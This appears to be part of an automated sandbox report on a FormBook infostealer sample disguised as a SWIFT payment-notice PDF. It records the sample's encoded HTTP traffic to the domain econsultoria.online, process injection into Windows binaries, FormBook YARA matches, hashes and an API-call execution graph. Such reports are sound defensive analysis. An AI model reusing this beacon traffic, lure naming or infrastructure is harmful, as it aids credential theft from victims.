                                                                                                                            Data Raw: 6d 52 75 3d 4b 55 58 46 64 64 69 6a 63 73 36 51 6b 35 4b 6e 69 63 59 30 67 75 68 4c 31 56 73 72 4b 61 65 50 33 78 64 37 2f 64 7a 64 63 6a 43 70 51 63 50 75 61 57 79 46 6f 44 4a 76 72 35 61 2f 6c 45 54 75 53 46 52 49 44 31 70 37 57 78 34 44 68 4b 6d 72 51 44 5a 59 46 6b 69 41 59 33 4a 6b 77 43 6f 6b 6d 64 43 30 6d 42 35 63 67 30 56 4a 6a 4e 33 5a 55 31 50 33 57 4d 71 4e 4e 76 66 4a 31 65 56 35 36 4d 50 4a 6d 62 46 35 6a 70 57 64 4a 73 54 4c 73 45 77 6e 6a 44 72 38 6f 6c 61 55 59 59 68 71 71 70 70 47 63 79 7a 53 49 73 79 76 6a 5a 7a 4c 46 45 54 33 2f 50 79 6b 46 48 6e 6a 32 75 33 42 54 4b 51 33 45 66 6f 67 6d 38 71 6c 50 32 67 38 43 73 51 42 36 6b 42 52 31 55 36 57 36 63 6b 58 6e 36 72 43 35 4d 56 7a 47 6e 71 65 41 50 64 63 72 77 6a 4a 4f 36 79 2b 37 41 6d 58 36 65 30 51 30 32 2f 42 6d 36 79 53 37 2f 49 61 79 39 39 63 53 71 75 69 47 4c 66 53 71 72 53 4f 30 79 32 79 2b 68 5a 31 61 47 5a 31 72 56 36 6b 42 54 54 2f 46 67 54 2f 70 64 37 39 34 4a 65 6d 75 53 62 56 4a 49 4c 5a 4c 48 4a 76 56 38 33 71 42 67 [TRUNCATED]
                                                                                                                            Data Ascii: mRu=KUXFddijcs6Qk5KnicY0guhL1VsrKaeP3xd7/dzdcjCpQcPuaWyFoDJvr5a/lETuSFRID1p7Wx4DhKmrQDZYFkiAY3JkwCokmdC0mB5cg0VJjN3ZU1P3WMqNNvfJ1eV56MPJmbF5jpWdJsTLsEwnjDr8olaUYYhqqppGcyzSIsyvjZzLFET3/PykFHnj2u3BTKQ3Efogm8qlP2g8CsQB6kBR1U6W6ckXn6rC5MVzGnqeAPdcrwjJO6y+7AmX6e0Q02/Bm6yS7/Iay99cSquiGLfSqrSO0y2y+hZ1aGZ1rV6kBTT/FgT/pd794JemuSbVJILZLHJvV83qBg9Ky6l1l7Wr56rYT25XIYqIKL6RTXYBBH457UlWCWiVOBl5schx4hY+lb8nowKkxzp4P0J1FGSg9clD37Z+izkitT5wUWfO57ieaMaaJhwz83qK44JwMycIfNBit5WckEeaZPu1c8WKJOG7YajjrtwHfN/KxsIs7tvNCQVUSgt7nTRK+J5AeP2qetTdDnyKCtDUGVf/nCwnYpN/PiK/+RIo8rTji49yVBSwO3sJFZrKMETgVzlriys3k1iqd72frc4M3yrjelxtOVGhsT94PgNkBfcRyaQwuOFCuRGnXv/ph19X3bOUGG8hiQrW8o45EhmXJKtOZuO4S/kW9OnbugCIF9zn3xrQPOO2GzIpIjyAcoUwQjcN4/fR7LJaeLon6rWh+Q/511XAt6vqfHAruewkJd86Ez4we8MKiMJfE9bpnObRim3hS/DPpBzre1cv+6qXrgxJEPRE7XaFuYRtxW5u7ZwAcvl4eilqc6z+QFMFnvfVnPuU/Bri3h3ecj2BKJGmYf3ALTm0YCTVPHzK4mt/kVgDjIjr408iHI502zniU4gwJYNfgndfvmJqAxGMhF+DraB6XFP13u1o4G5e2RYho9b5WdBMwfi4CLlZwmNwI3IGtN7SEAnrJoK711B7wxwq/tFi3uNG7/ztF2llbPROkwtelgB2epRo [TRUNCATED]
                                                                                                                            Nov 12, 2024 15:35:23.354824066 CET5156OUTData Raw: 71 30 4a 48 30 74 69 52 6d 36 4b 33 35 35 41 73 39 63 48 49 67 36 59 58 4f 62 53 76 6d 4d 6c 31 37 79 53 37 4e 59 45 57 59 43 30 6b 5a 68 75 48 77 68 59 52 2f 77 46 63 4e 42 4a 33 50 76 47 63 77 69 44 2b 72 32 4d 4d 6a 68 71 53 53 42 55 32 2f 64
                                                                                                                            Data Ascii: q0JH0tiRm6K355As9cHIg6YXObSvmMl17yS7NYEWYC0kZhuHwhYR/wFcNBJ3PvGcwiD+r2MMjhqSSBU2/dHfFogXnBzh4son/31eJEZ7qR1n8RKfiOsvPM1B9RS1IJ54q+Hr/ARyB9bND0QG/HDGs1oW8gYtTnzLbVG5LScsK3etobclDNiIN3pCtzL7KU5cbaBh0hp+BlnAqq37E+FRneJ5zvp6NY/XKXUqv0Ig+HDVZlb7+6b
                                                                                                                            Nov 12, 2024 15:35:23.354899883 CET203OUTData Raw: 41 47 63 62 6c 72 4c 38 63 38 36 55 2f 4a 62 73 39 37 79 32 39 73 38 6b 62 31 61 53 58 4a 2f 4b 7a 56 71 50 2b 6d 61 67 56 51 55 31 6e 79 77 32 49 37 59 69 49 57 65 2b 48 57 48 6a 57 6f 49 47 78 44 32 41 36 71 37 63 54 30 6e 6f 4e 54 51 5a 68 4b
                                                                                                                            Data Ascii: AGcblrL8c86U/Jbs97y29s8kb1aSXJ/KzVqP+magVQU1nyw2I7YiIWe+HWHjWoIGxD2A6q7cT0noNTQZhKj0UwjkwYQD03Rw1pguNyiBkeJ1SBYhVQTNGQOzf+p1RkBYLwMz5MQI/rMdDSVSt1C2oM6hu59ZrJCut+zX9yw4dtu4j7643SKE9YUU0J4fAd9rL77ZgtOMw==


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            93192.168.11.20498123.33.130.19080
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            Nov 12, 2024 15:35:26.025338888 CET482OUTGET /cbd3/?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM HTTP/1.1
                                                                                                                            Host: www.econsultoria.online
                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                            Accept-Language: en-US
                                                                                                                            Connection: close
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.13.US Safari/537.36
                                                                                                                            Nov 12, 2024 15:35:26.164432049 CET388INHTTP/1.1 200 OK
                                                                                                                            Server: openresty
                                                                                                                            Date: Tue, 12 Nov 2024 14:35:26 GMT
                                                                                                                            Content-Type: text/html
                                                                                                                            Content-Length: 248
                                                                                                                            Connection: close
                                                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 52 75 3d 48 57 2f 6c 65 72 4f 79 56 71 43 58 75 37 6e 30 74 2f 45 55 6c 59 4a 30 32 79 31 79 4e 64 48 7a 6f 47 73 74 78 76 7a 6e 63 51 62 59 66 73 62 51 65 52 32 64 74 78 78 4d 76 4d 50 72 6d 31 65 53 63 68 42 4c 42 6b 41 6c 66 68 38 65 79 34 47 73 55 48 63 57 5a 43 6a 64 56 51 31 45 30 69 73 38 74 66 69 77 2b 79 4a 48 69 43 41 68 68 75 58 30 4b 79 54 48 58 65 45 3d 26 55 4a 3d 37 48 31 58 4d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?mRu=HW/lerOyVqCXu7n0t/EUlYJ02y1yNdHzoGstxvzncQbYfsbQeR2dtxxMvMPrm1eSchBLBkAlfh8ey4GsUHcWZCjdVQ1E0is8tfiw+yJHiCAhhuX0KyTHXeE=&UJ=7H1XM"}</script></head></html>


                                                                                                                            Click to jump to process

                                                                                                                            Click to jump to process

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Click to jump to process

                                                                                                                            Target ID:0
                                                                                                                            Start time:09:28:40
                                                                                                                            Start date:12/11/2024
                                                                                                                            Path:C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:966'221 bytes
                                                                                                                            MD5 hash:FBC1B3A9567B4153601F2F845ECFEDF2
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:low
                                                                                                                            Has exited:true

                                                                                                                            Target ID:2
                                                                                                                            Start time:09:28:42
                                                                                                                            Start date:12/11/2024
                                                                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe"
                                                                                                                            Imagebase:0xc30000
                                                                                                                            File size:47'016 bytes
                                                                                                                            MD5 hash:B7C999040D80E5BF87886D70D992C51E
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Target ID:11
                                                                                                                            Start time:09:29:28
                                                                                                                            Start date:12/11/2024
                                                                                                                            Path:C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe"
                                                                                                                            Imagebase:0xb30000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:12
                                                                                                                            Start time:09:29:29
                                                                                                                            Start date:12/11/2024
                                                                                                                            Path:C:\Windows\SysWOW64\DevicePairingWizard.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Windows\SysWOW64\DevicePairingWizard.exe"
                                                                                                                            Imagebase:0x930000
                                                                                                                            File size:83'968 bytes
                                                                                                                            MD5 hash:2A4C038870FD0083037A7B07FEAAEDE5
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:false

                                                                                                                            Target ID:13
                                                                                                                            Start time:09:29:43
                                                                                                                            Start date:12/11/2024
                                                                                                                            Path:C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Program Files (x86)\KnVujMQDoPXkDUoRAXTHOxIkXALxcophjYtVAKiVgDEXmsZnoEILiqJIHZfMfNF\nmlZZxePqIALDF.exe"
                                                                                                                            Imagebase:0xb30000
                                                                                                                            File size:140'800 bytes
                                                                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:high
                                                                                                                            Has exited:false

                                                                                                                            Target ID:14
                                                                                                                            Start time:09:29:55
                                                                                                                            Start date:12/11/2024
                                                                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                                                            Imagebase:0x7ff7eb000000
                                                                                                                            File size:597'432 bytes
                                                                                                                            MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:moderate
                                                                                                                            Has exited:true

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:3.8%
                                                                                                                              Dynamic/Decrypted Code Coverage:0.4%
                                                                                                                              Signature Coverage:8.7%
                                                                                                                              Total number of Nodes:2000
                                                                                                                              Total number of Limit Nodes:41
                                                                                                                              execution_graph 86127 4010e0 86130 401100 86127->86130 86129 4010f8 86131 401113 86130->86131 86133 401184 86131->86133 86134 40114c 86131->86134 86143 401120 86131->86143 86161 401182 86131->86161 86132 40112c DefWindowProcW 86132->86129 86168 401250 61 API calls 86133->86168 86136 401151 86134->86136 86137 40119d 86134->86137 86141 401219 86136->86141 86142 40115d 86136->86142 86139 4011a3 86137->86139 86140 42afb4 86137->86140 86138 401193 86138->86129 86139->86143 86150 4011b6 KillTimer 86139->86150 86151 4011db SetTimer RegisterWindowMessageW 86139->86151 86170 40f190 10 API calls 86140->86170 86141->86143 86146 401225 86141->86146 86144 401163 86142->86144 86145 42b01d 86142->86145 86143->86132 86175 401000 Shell_NotifyIconW 86143->86175 86152 42afe9 86144->86152 86153 40116c 86144->86153 86145->86132 86174 4370f4 52 API calls 86145->86174 86177 468b0e 74 API calls 86146->86177 86149 42b04f 86176 40e0c0 74 API calls 86149->86176 86169 401000 Shell_NotifyIconW 86150->86169 86151->86138 86158 401204 CreatePopupMenu 86151->86158 86172 40f190 10 API calls 86152->86172 86153->86143 86160 401174 86153->86160 86158->86129 86171 45fd57 65 API calls 86160->86171 86161->86132 86162 42afe4 86162->86138 86163 42b00e 86173 401a50 400 API calls 86163->86173 86164 4011c9 PostQuitMessage 86164->86129 86167 42afdc 86167->86132 86167->86162 86168->86138 86169->86164 86170->86138 86171->86167 86172->86163 86173->86161 86174->86161 86175->86149 86176->86161 86177->86162 86178 42d142 86182 480a8d 86178->86182 86180 42d14f 86181 480a8d 261 API calls 86180->86181 86181->86180 86183 480ae4 86182->86183 86184 480b26 86182->86184 86186 480aeb 86183->86186 86187 480b15 86183->86187 86213 40bc70 86184->86213 86189 480aee 86186->86189 86190 480b04 86186->86190 86224 4805bf 261 API calls 86187->86224 86189->86184 86191 480af3 86189->86191 86223 47fea2 261 API calls 86190->86223 86222 47f135 261 API calls 86191->86222 86197 480b2e 86198 480aff 86197->86198 86200 40c2c0 52 API calls 86197->86200 86205 408e80 VariantClear 86197->86205 86206 480ff5 86197->86206 86207 40e710 53 API calls 86197->86207 86208 40a780 261 API calls 86197->86208 86218 40e0a0 86197->86218 86225 401980 86197->86225 86233 45377f 52 API calls 86197->86233 86234 45e951 53 API calls 86197->86234 86235 40e830 86197->86235 86248 47925f 53 API calls 86197->86248 86249 47fcff 261 API calls 86197->86249 86251 408f40 86198->86251 86199 481156 86201 408f40 VariantClear 86199->86201 86200->86197 86202 48115e 86201->86202 86202->86180 86205->86197 86250 45e737 90 API calls 86206->86250 86207->86197 86208->86197 86255 4115d7 86213->86255 86216 4115d7 52 API calls 86217 40bca6 86216->86217 86217->86197 86219 40e0b2 86218->86219 86220 40e0a8 86218->86220 86219->86197 86289 403c30 52 API calls 86220->86289 86222->86198 86223->86198 86224->86198 86226 4019a3 86225->86226 86227 401985 86225->86227 86226->86227 86228 4019b8 86226->86228 86230 40199f 86227->86230 86290 403e10 53 API calls 86227->86290 86291 403e10 53 API calls 86228->86291 86230->86197 86232 4019c4 86232->86197 86233->86197 86234->86197 86236 427c86 86235->86236 86237 40e84a 86235->86237 86293 40e1f0 VariantClear 86236->86293 86292 40e950 53 API calls 86237->86292 86240 40e84f 86241 40e85c 86240->86241 86242 427c8b 86240->86242 86244 4115d7 52 API calls 86241->86244 86247 40e907 86241->86247 86294 40e950 53 API calls 86242->86294 86245 40e8fc 86244->86245 86246 4115d7 52 API calls 86245->86246 86246->86247 86247->86197 86248->86197 86249->86197 86250->86198 86252 408f48 86251->86252 86253 4265c7 VariantClear 86252->86253 86254 408f55 86252->86254 86253->86254 86254->86199 86257 4115e1 86255->86257 86258 40bc98 86257->86258 86261 4115fd 86257->86261 86266 4135bb 86257->86266 86258->86216 86259 41163b 86281 4180af 46 API calls 86259->86281 86261->86259 86280 41130a 51 API calls 86261->86280 86262 411645 86282 418105 RaiseException 86262->86282 86265 411656 86267 413638 86266->86267 86272 4135c9 86266->86272 86288 417f77 46 API calls 86267->86288 86270 4135f7 RtlAllocateHeap 86270->86272 86279 413630 86270->86279 86272->86270 86273 4135d4 86272->86273 86274 413624 86272->86274 86277 413622 86272->86277 86273->86272 86283 418901 46 API calls 86273->86283 86284 418752 46 API calls 86273->86284 86285 411682 GetModuleHandleW GetProcAddress ExitProcess 86273->86285 86286 417f77 46 API calls 86274->86286 86287 417f77 46 API calls 86277->86287 86279->86257 86280->86259 86281->86262 86282->86265 86283->86273 86284->86273 86286->86277 86287->86279 86288->86279 86289->86219 86290->86230 86291->86232 86292->86240 86293->86242 86294->86247 86295 40bd20 86296 428194 86295->86296 86297 40bd2d 86295->86297 86298 40bd43 86296->86298 86301 4281bc 86296->86301 86302 4281b2 86296->86302 86299 40bd37 86297->86299 86318 4531b1 85 API calls 86297->86318 86307 40bd50 86299->86307 86317 45e987 86 API calls 86301->86317 86316 40b510 VariantClear 86302->86316 86306 4281ba 86308 426cf1 86307->86308 86309 40bd63 86307->86309 86328 44cde9 52 API calls 86308->86328 86319 40bd80 86309->86319 86312 40bd73 86312->86298 86313 426cfc 86314 40e0a0 52 API calls 86313->86314 86315 426d02 86314->86315 86316->86306 86317->86297 86318->86299 86320 40bd8e 86319->86320 86321 40bdb7 86319->86321 86320->86321 86322 40bded 86320->86322 86323 40bdad 86320->86323 86321->86312 86325 4115d7 52 API calls 86322->86325 86329 402f00 86323->86329 86326 40bdf6 86325->86326 86326->86321 86327 4115d7 52 API calls 86326->86327 86327->86321 86328->86313 86330 402f0c 86329->86330 86331 402f10 86329->86331 86330->86321 86332 4115d7 52 API calls 86331->86332 86333 4268c3 86331->86333 86334 402f51 86332->86334 86334->86321 86335 425ba2 86340 40e360 86335->86340 86337 425bb4 86356 41130a 51 API calls 86337->86356 86339 425bbe 86341 4115d7 52 API calls 86340->86341 86342 40e3ec GetModuleFileNameW 86341->86342 86357 413a0e 86342->86357 86344 40e421 86360 413a9e 86344->86360 86347 4115d7 52 API calls 86348 40e45e 86347->86348 86349 40bc70 52 API calls 86348->86349 86350 40e498 86349->86350 86363 40e4c0 86350->86363 86352 40e4a9 86352->86337 86353 40e4a1 86353->86352 86354 4115d7 52 API calls 86353->86354 86355 401c90 52 API calls 86353->86355 86354->86353 86355->86353 86356->86339 86377 413801 86357->86377 86407 419efd 86360->86407 86419 403350 86363->86419 86365 40e4cb RegOpenKeyExW 86366 427190 RegQueryValueExW 86365->86366 86367 40e4eb 86365->86367 86368 4271b0 86366->86368 86369 42721a RegCloseKey 86366->86369 86367->86353 86370 4115d7 52 API calls 86368->86370 86369->86353 86371 4271cb 86370->86371 86426 43652f 52 API calls 86371->86426 86373 4271d8 RegQueryValueExW 86374 4271f7 86373->86374 86376 42720e 86373->86376 86427 402160 86374->86427 86376->86369 86378 41389e 86377->86378 86385 41381a 86377->86385 86379 4139e8 86378->86379 86380 413a00 86378->86380 86404 417f77 46 API calls 86379->86404 86406 417f77 46 API calls 86380->86406 86383 4139ed 86405 417f25 10 API calls 86383->86405 86385->86378 86390 41388a 86385->86390 86399 419e30 46 API calls 86385->86399 86387 41396c 86387->86378 86388 413967 86387->86388 86391 41397a 86387->86391 86388->86344 86389 413929 86389->86378 86392 413945 86389->86392 86401 419e30 46 API calls 86389->86401 86390->86378 86398 413909 86390->86398 86400 419e30 46 API calls 86390->86400 86403 419e30 46 API calls 86391->86403 86392->86378 86392->86388 86394 41395b 86392->86394 86402 419e30 46 API calls 86394->86402 86398->86387 86398->86389 86399->86390 86400->86398 86401->86392 86402->86388 86403->86388 86404->86383 86405->86388 86406->86388 86408 419f13 86407->86408 86409 419f0e 86407->86409 86416 417f77 46 API calls 86408->86416 86409->86408 86415 419f2b 86409->86415 86411 419f18 86417 417f25 10 API calls 86411->86417 86413 40e454 86413->86347 86415->86413 86418 417f77 46 API calls 86415->86418 86416->86411 86417->86413 86418->86411 86420 403367 86419->86420 86421 403358 86419->86421 86422 4115d7 52 API calls 86420->86422 86421->86365 86423 403370 86422->86423 86424 4115d7 52 API calls 86423->86424 86425 40339e 86424->86425 86425->86365 86426->86373 86428 426daa 86427->86428 86429 40216b 86427->86429 86442 40c600 86428->86442 86432 402180 86429->86432 86433 40219e 86429->86433 86431 426db5 86431->86376 86440 403bd0 52 API calls 86432->86440 86441 4013a0 52 API calls 86433->86441 86436 402187 86436->86376 86437 4021a5 86438 426db7 86437->86438 86439 4115d7 52 API calls 86437->86439 86439->86436 86440->86436 86441->86437 86443 40c619 86442->86443 86444 40c60a 86442->86444 86443->86431 86444->86443 86447 4026f0 86444->86447 86446 426d7a 86446->86431 86448 426873 86447->86448 86449 4026ff 86447->86449 86454 4013a0 52 API calls 86448->86454 86449->86446 86451 42687b 86452 4115d7 52 API calls 86451->86452 86453 42689e 86452->86453 86453->86446 86454->86451 86455 416454 86492 416c70 86455->86492 86457 416460 GetStartupInfoW 86458 416474 86457->86458 86493 419d5a HeapCreate 86458->86493 86460 4164cd 86461 4164d8 86460->86461 86577 41642b 46 API calls 86460->86577 86494 417c20 GetModuleHandleW 86461->86494 86464 4164de 86466 4164e9 86464->86466 86578 41642b 46 API calls 86464->86578 86513 41aaa1 GetStartupInfoW 86466->86513 86469 416503 GetCommandLineW 86526 41f584 GetEnvironmentStringsW 86469->86526 86473 416513 86532 41f4d6 GetModuleFileNameW 86473->86532 86475 41651d 86476 416528 86475->86476 86580 411924 46 API calls 86475->86580 86536 41f2a4 86476->86536 86479 41652e 86480 416539 86479->86480 86581 411924 46 API calls 86479->86581 86550 411703 86480->86550 86483 416541 86485 41654c 86483->86485 86582 411924 46 API calls 86483->86582 86554 40d6b0 86485->86554 86488 41657c 86584 411906 46 API calls 86488->86584 86491 416581 86492->86457 86493->86460 86495 417c34 86494->86495 86496 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 86494->86496 86585 4178ff 49 API calls 86495->86585 86497 417c87 TlsAlloc 86496->86497 86501 417cd5 TlsSetValue 86497->86501 86502 417d96 86497->86502 86499 417c39 86499->86464 86501->86502 86503 417ce6 86501->86503 86502->86464 86586 418151 InitializeCriticalSectionAndSpinCount 86503->86586 86505 417d91 86594 4178ff 49 API calls 86505->86594 86507 417d2a 86507->86505 86587 416b49 86507->86587 86510 417d76 86593 41793c 46 API calls 86510->86593 86512 417d7e GetCurrentThreadId 86512->86502 86514 416b49 46 API calls 86513->86514 86525 41aabf 86514->86525 86515 41ac34 86516 41ac6a GetStdHandle 86515->86516 86518 41acce SetHandleCount 86515->86518 86519 41ac7c GetFileType 86515->86519 86524 41aca2 InitializeCriticalSectionAndSpinCount 86515->86524 86516->86515 86517 416b49 46 API calls 86517->86525 86520 4164f7 86518->86520 86519->86515 86520->86469 86579 411924 46 API calls 86520->86579 86521 41abb4 86521->86515 86522 41abe0 GetFileType 86521->86522 86523 41abeb InitializeCriticalSectionAndSpinCount 86521->86523 86522->86521 86522->86523 86523->86520 86523->86521 86524->86515 86524->86520 86525->86515 86525->86517 86525->86520 86525->86521 86525->86525 86527 41f595 86526->86527 86528 41f599 86526->86528 86527->86473 86604 416b04 86528->86604 86530 41f5bb 86531 41f5c2 FreeEnvironmentStringsW 86530->86531 86531->86473 86533 41f50b 86532->86533 86534 416b04 46 API calls 86533->86534 86535 41f54e 86533->86535 86534->86535 86535->86475 86537 41f2bc 86536->86537 86541 41f2b4 86536->86541 86538 416b49 46 API calls 86537->86538 86543 41f2e0 86538->86543 86539 41f336 86611 413748 86539->86611 86541->86479 86542 416b49 46 API calls 86542->86543 86543->86539 86543->86541 86543->86542 86544 41f35c 86543->86544 86547 41f373 86543->86547 86610 41ef12 46 API calls 86543->86610 86545 413748 46 API calls 86544->86545 86545->86541 86617 417ed3 86547->86617 86549 41f37f 86549->86479 86551 411711 86550->86551 86553 411750 86551->86553 86636 41130a 51 API calls 86551->86636 86553->86483 86555 42e2f3 86554->86555 86556 40d6cc 86554->86556 86557 408f40 VariantClear 86556->86557 86558 40d707 86557->86558 86637 40ebb0 86558->86637 86561 40d737 86640 411951 86561->86640 86566 40d751 86652 40f4e0 SystemParametersInfoW SystemParametersInfoW 86566->86652 86568 40d75f 86653 40d590 GetCurrentDirectoryW 86568->86653 86570 40d767 SystemParametersInfoW 86571 40d794 86570->86571 86572 40d78d FreeLibrary 86570->86572 86573 408f40 VariantClear 86571->86573 86572->86571 86574 40d79d 86573->86574 86575 408f40 VariantClear 86574->86575 86576 40d7a6 86575->86576 86576->86488 86583 4118da 46 API calls 86576->86583 86577->86461 86578->86466 86583->86488 86584->86491 86585->86499 86586->86507 86589 416b52 86587->86589 86590 416b8f 86589->86590 86591 416b70 Sleep 86589->86591 86595 41f677 86589->86595 86590->86505 86590->86510 86592 416b85 86591->86592 86592->86589 86592->86590 86593->86512 86594->86502 86596 41f683 86595->86596 86602 41f69e 86595->86602 86597 41f68f 86596->86597 86596->86602 86603 417f77 46 API calls 86597->86603 86599 41f6b1 HeapAlloc 86601 41f6d8 86599->86601 86599->86602 86600 41f694 86600->86589 86601->86589 86602->86599 86602->86601 86603->86600 86607 416b0d 86604->86607 86605 4135bb 45 API calls 86605->86607 86606 416b43 86606->86530 86607->86605 86607->86606 86608 416b24 Sleep 86607->86608 86609 416b39 86608->86609 86609->86606 86609->86607 86610->86543 86612 41377c 86611->86612 86613 413753 RtlFreeHeap 86611->86613 86612->86541 86613->86612 86614 413768 86613->86614 86620 417f77 46 API calls 86614->86620 86616 41376e GetLastError 86616->86612 86621 417daa 86617->86621 86620->86616 86622 417dc9 86621->86622 86623 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 86622->86623 86624 417eb5 86623->86624 86627 41a208 86624->86627 86626 417ed1 GetCurrentProcess TerminateProcess 86626->86549 86628 41a210 86627->86628 86629 41a212 IsDebuggerPresent 86627->86629 86628->86626 86635 41fe19 86629->86635 86632 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 86633 421ff0 86632->86633 86634 421ff8 GetCurrentProcess TerminateProcess 86632->86634 86633->86634 86634->86626 86635->86632 86636->86553 86693 40ebd0 86637->86693 86697 4182cb 86640->86697 86642 41195e 86704 4181f2 LeaveCriticalSection 86642->86704 86644 40d748 86645 4119b0 86644->86645 86646 4119d6 86645->86646 86647 4119bc 86645->86647 86646->86566 86647->86646 86739 417f77 46 API calls 86647->86739 86649 4119c6 86740 417f25 10 API calls 86649->86740 86651 4119d1 86651->86566 86652->86568 86741 401f20 86653->86741 86655 40d5b6 IsDebuggerPresent 86656 40d5c4 86655->86656 86657 42e1bb MessageBoxA 86655->86657 86658 42e1d4 86656->86658 86659 40d5e3 86656->86659 86657->86658 86914 403a50 52 API calls 86658->86914 86811 40f520 86659->86811 86662 40d63b 86666 40d643 86662->86666 86668 42e231 SetCurrentDirectoryW 86662->86668 86664 40d5fd GetFullPathNameW 86823 401460 86664->86823 86667 40d64c 86666->86667 86915 432fee 6 API calls 86666->86915 86838 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 86667->86838 86668->86666 86671 42e252 86671->86667 86673 42e25a GetModuleFileNameW 86671->86673 86675 42e274 86673->86675 86676 42e2cb GetForegroundWindow ShellExecuteW 86673->86676 86916 401b10 86675->86916 86680 40d688 86676->86680 86677 40d656 86679 40d669 86677->86679 86912 40e0c0 74 API calls 86677->86912 86846 4091e0 86679->86846 86684 40d692 SetCurrentDirectoryW 